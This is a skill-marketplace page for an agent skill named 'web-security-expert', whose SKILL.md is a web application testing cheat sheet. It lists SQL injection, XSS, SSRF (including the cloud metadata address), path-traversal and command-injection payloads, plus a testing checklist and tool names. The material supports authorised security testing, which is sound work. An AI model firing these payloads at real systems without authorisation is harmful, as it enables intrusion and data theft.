ripgraphics/web-security-expert
.cursor/skills/web-security-expert/SKILL.md
Web application security expert. OWASP Top 10, XSS, SQLi, CSRF, SSRF, authentication bypass, IDOR. Use for web app security testing.
development
Updated Apr 16, 2026
$ install --global
skillsauthnpx skillsauth add ripgraphics/authorsinfo web-security-expertInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 24, 2026, 8:55 PM1.8s1 file scanned
SKILL.md
- name:
- web-security-expert
- description:
- >-
Web Security Expert
OWASP Top 10 Quick Reference
| Vuln | Test | Payload Example |
|------|------|-----------------|
| SQLi | ', ", 1 OR 1=1 | ' UNION SELECT null,username,password FROM users-- |
| XSS | <script>, event handlers | <img src=x onerror=alert(1)> |
| SSRF | Internal URLs | http://127.0.0.1, http://169.254.169.254 |
| IDOR | Change IDs | /api/user/123 → /api/user/124 |
| LFI | Path traversal | ../../../etc/passwd |
| RCE | Command chars | ; id, | whoami, `id` |
Testing Checklist
Authentication
- [ ] Brute force protection
- [ ] Password reset flaws
- [ ] Session fixation
- [ ] JWT vulnerabilities
Authorization
- [ ] IDOR on all endpoints
- [ ] Privilege escalation
- [ ] Missing function level access
Input Validation
- [ ] SQLi all parameters
- [ ] XSS reflected/stored
- [ ] Command injection
- [ ] File upload bypass
Quick Payloads
# SQLi
' OR '1'='1
' UNION SELECT null,null,null--
'; WAITFOR DELAY '0:0:5'--
# XSS
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
javascript:alert(1)
# SSRF
http://127.0.0.1:80
http://[::]:80
http://169.254.169.254/latest/meta-data/
# LFI
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
Tools
| Purpose | Tool | |---------|------| | Proxy | Burp Suite, OWASP ZAP | | SQLi | sqlmap | | XSS | XSStrike, dalfox | | Fuzzing | ffuf, wfuzz |
Related Skills
ripgraphics/webpack-expert
tools
VerifiedTrustedCommunity
Webpack build optimization expert with deep knowledge of configuration patterns, bundle analysis, code splitting, module federation, performance optimization, and plugin/loader ecosystem. Use PROACTIVELY for any Webpack bundling issues including complex optimizations, build performance, custom plugins/loaders, and modern architecture patterns. If a specialized expert is a better fit, I will recommend switching and stop.
SKILL.mdUpdated Apr 16, 2026
ripgraphics/vitest-testing-expert
testing
VerifiedTrustedCommunity
Vitest testing framework expert for Vite integration, Jest migration, browser mode testing, and performance optimization
SKILL.mdUpdated Apr 16, 2026
ripgraphics/vite-expert
tools
VerifiedTrustedCommunity
Vite build optimization expert with deep knowledge of ESM-first development, HMR optimization, plugin ecosystem, production builds, library mode, and SSR configuration. Use PROACTIVELY for any Vite bundling issues including dev server performance, build optimization, plugin development, and modern ESM patterns. If a specialized expert is a better fit, I will recommend switching and stop.
SKILL.mdUpdated Apr 16, 2026
ripgraphics/vercel-dashboard-expert
tools
VerifiedTrustedCommunity
Expert in connecting to and managing Vercel Dashboard via CLI
SKILL.mdUpdated Apr 16, 2026